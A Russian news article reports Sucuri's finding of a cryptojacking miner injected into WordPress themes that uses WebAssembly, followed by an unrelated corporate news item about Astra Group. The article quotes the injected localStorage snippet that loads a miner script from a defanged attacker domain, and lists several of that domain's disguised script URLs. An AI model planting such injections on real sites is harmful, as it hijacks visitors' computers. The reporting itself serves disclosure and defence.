Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly

Татьяна Никитина 26 Июля 2022 - 16:26

Домашние пользователи

...

Эксперты Sucuri обнаружили необычный JavaScript-майнер, загружаемый на страницы при посещении взломанного сайта. Злоумышленники используют технологию WebAssembly, чтобы ускорить исполнение сценария и осложнить выявление вредоносных инъекций.

Бинарный формат WebAssembly (.wasm), позволяющий выполнять высокопроизводительные приложения на веб-страницах со скоростью, близкой к нативной, в настоящее время поддерживают более 95% установленных браузеров, в том числе Google Chrome, Microsoft Edge, Safari, Firefox и Opera. Код Wasm загружается и запускается из JavaScript и может работать в параллель в той же песочнице, обмениваясь данными с кодом JavaScript.

В Sucuri узнали о нововведении криптоджекеров, когда новый клиент запросил помощи— его компьютер начал сильно тормозить при подключении к персональному сайту WordPress. Беглый просмотр файлов на сайте выявил небольшой фрагмент кода, вставленный в один из файлов темы:

localStorage.setItem('f', 'auto.config({ login: "6110659", pass: "auto" }).power(10);');localStorage.setItem('s', 'hxxps://wm[.]bmwebm[.]org/auto.js');

Каждый раз, когда посетитель заходит на веб-страницу, этот сниппет загружает на стороне клиента скрипт auto.js из домена wm[.]bmwebm[.]org. Содержимое JavaScript-файла оказалось обфусцированным с помощью CharCode; декодирование показало, что это криптомайнер, стартующий при каждом визите на сайт.

Вшитые учетные данные, по всей видимости, используются для доступа к кастомному пулу в том же домене. Особый интерес у исследователей вызвала такая находка, как использование WebAssembly для запуска бинарного кода в среде браузера.

Расшифрованный auto.js также содержал инструкции для операций майнинга, которые исполняются в браузере вместе с JavaScript.

Позднее тот же самый криптомайнер был обнаружен на другом взломанном сайте, но уже под именем adservicegoogle.js. Он загружался из того же домена и пытался выдать себя за легитимный скрипт Google Ads.

Домен hxxps://wm[.]bmwebm[.]org/ был зарегистрирован в январе 2021 года, то есть полтора года криптоджекерам удавалось остаться незамеченными. В настоящее время (на 26 июля) их майнер работает на 195 сайтах, в том числе в TLD-зоне RU; по всей видимости, скромный масштаб киберкампании тоже помог злоумышленникам оставаться в тени.

Примечательно, что отдаваемые вредоносные JavaScript-файлы генерируются автоматически — злоумышленники просто меняют имя, добавляемое к домену:

hxxps://wm[.]bmwebm[.]org/wordpresscore.js
hxxps://wm[.]bmwebm[.]org/common.js
hxxps://wm[.]bmwebm[.]org/facebook-sdk.js
hxxps://wm[.]bmwebm[.]org/twitter.js
hxxps://wm[.]bmwebm[.]org/node.js

Реализованная функциональность также позволяет внедрять скрипты в разные места на зараженном сайте и поддерживать видимость легитимности инъекций.

Эксперты ожидают расширения использования WebAssembly киберкриминалом, несмотря на очевидное ограничение — зависимость от JavaScript. Код Wasm не способен самостоятельно собирать данные, подключаться к интернету и сливать награбленное на сторону. В составе веб-скимера, например, такой компонент может диктовать JavaScript, на каких веб-формах сосредоточиться, какой домен использовать для вывода данных и т. п.

Использование Wasm, по словам Sucuri, способно затруднить выявление злонамеренных редиректоров, вредоносной рекламы, ложной техподдержки, скриптовых кейлоггеров, скрытых загрузок (drive-by) и других неблаговидных способов использования браузера. В тех случаях, когда браузер содержит уязвимость 0-day, оперирующий Wasm злоумышленник может причинить еще больше вреда — путем использования бинарного кода для эксплойта, и такую функциональность вряд ли обнаружит антивирусный сканер, заточенный под строковый анализ.

На сайтах подобные заражения тоже трудно выявить, если не с чем сравнить (нет бэкапа). Там, где Wasm уже используется в повседневных операциях, задача еще больше усложняется. Предотвратить инфицирование, по мнению экспертов, помогут следующие меры:

поддержка всего софта (CMS, плагинов, тем) в актуальном состоянии;
усиление защиты сайта и админ-панелей от брутфорса и словарных атак;
создание бэкапа и регулярное копирование контента и базы данных, с сохранением резервных копий вне сайта;
регулярные проверки целостности содержимого файлов на сайте;
использование средств фильтрации трафика прикладного уровня (WAF).

Следующая главная новость »

Многофакторная аутентификация 2026 - обсудим в эфире AM Live! Регистрируйтесь »

Екатерина Быстрова 02 Февраля 2026 - 11:20

Корпорации «Группа Астра»

Отгрузки «Группы Астра» в 2025 году выросли до 21,8 млрд рублей

«Группа Астра» подвела итоги 2025 года по отгрузкам — ключевому управленческому показателю компании. За год они выросли на 9% и составили 21,8 млрд рублей. Рост обеспечили расширение клиентской базы, масштабирование бизнеса и развитие продуктовой экосистемы.

Количество клиентов компании превысило 18,5 тыс. Для сравнения: в 2024 году их было чуть более 18,1 тыс., а в 2023-м — около 10,2 тыс.

Параллельно «Группа Астра» усилила позиции в части технологических партнёрств: число решений, совместимых с её экосистемой, за год выросло на 28% — до 4 144.

Заместитель генерального директора по экономике и финансам «Группы Астра» Елена Бородкина отметила, что итоговые показатели превзошли декабрьские ожидания компании. По её словам, даже в условиях жёсткой денежно-кредитной политики отгрузки приблизились к 22 млрд рублей, что подтвердило устойчивость бизнес-модели. Компания продолжает пилотировать свои продукты в инфраструктуре заказчиков и рассчитывает, что по мере улучшения экономической ситуации этот отложенный спрос будет конвертироваться в продажи.

В течение года «Группа Астра» активно инвестировала в развитие продуктов, операционную эффективность и партнёрскую экосистему. Количество решений, прошедших сертификацию Ready for Astra, превысило 4 100, что, по оценке компании, упрощает миграцию заказчиков на отечественное ПО.

Среди корпоративных событий компания отметила ход программы обратного выкупа акций, запущенной в апреле 2025 года. По состоянию на 2 февраля «Группа Астра» выкупила 650 тыс. акций — примерно столько же бумаг ранее было передано сотрудникам в рамках программы долгосрочной мотивации. Окончательный объём buyback будет зависеть от финансового положения компании, рыночной цены акций и выполнения KPI менеджмента.

В IV квартале 2025 года компания продолжила расширять клиентскую базу и реализовывать крупные проекты. В частности, один из крупнейших российских производителей минеральных удобрений «Фосагро» перевёл более 2 тыс. сотрудников на Astra Linux, а к 2027 году планирует довести это число до 7 тыс. Также «Группа Астра» совместно с TECHNORED представила прототип системы управления промышленными роботами на базе своей операционной системы.

За весь 2025 год компания выпустила 94 минорных и мажорных релиза продуктов экосистемы. В четвёртом квартале вышла новая версия Astra Linux 1.8.4 с доработками в области администрирования, безопасности и виртуализации. Кроме того, на рынок была выведена линейка программно-аппаратных комплексов Astra XPlatform для быстрого развёртывания ИТ-инфраструктуры.

Отдельное внимание в конце года уделялось развитию экосистемы и вопросам информационной безопасности. Платформа контейнеризации «Боцман» была включена в реестр средств защиты информации ФСТЭК, а в программе Ready for Astra к концу года участвовало более 1 450 партнёров.

Компания также продолжила образовательные инициативы. В IV квартале «Астра-лаборатории» открылись в Ижевске и на Кубани, были запущены проекты в Бурятии, а совместно с РУДН, РАНХиГС и hh.ru компания начала развивать программы обучения и подтверждения ИТ-компетенций. Министерство просвещения РФ отметило вклад «Группы Астра» в развитие системы среднего профессионального образования.

Финансовые результаты по МСФО за 12 месяцев 2025 года компания планирует раскрыть 31 марта.

Многофакторная аутентификация 2026 - обсудим в эфире AM Live! Регистрируйтесь »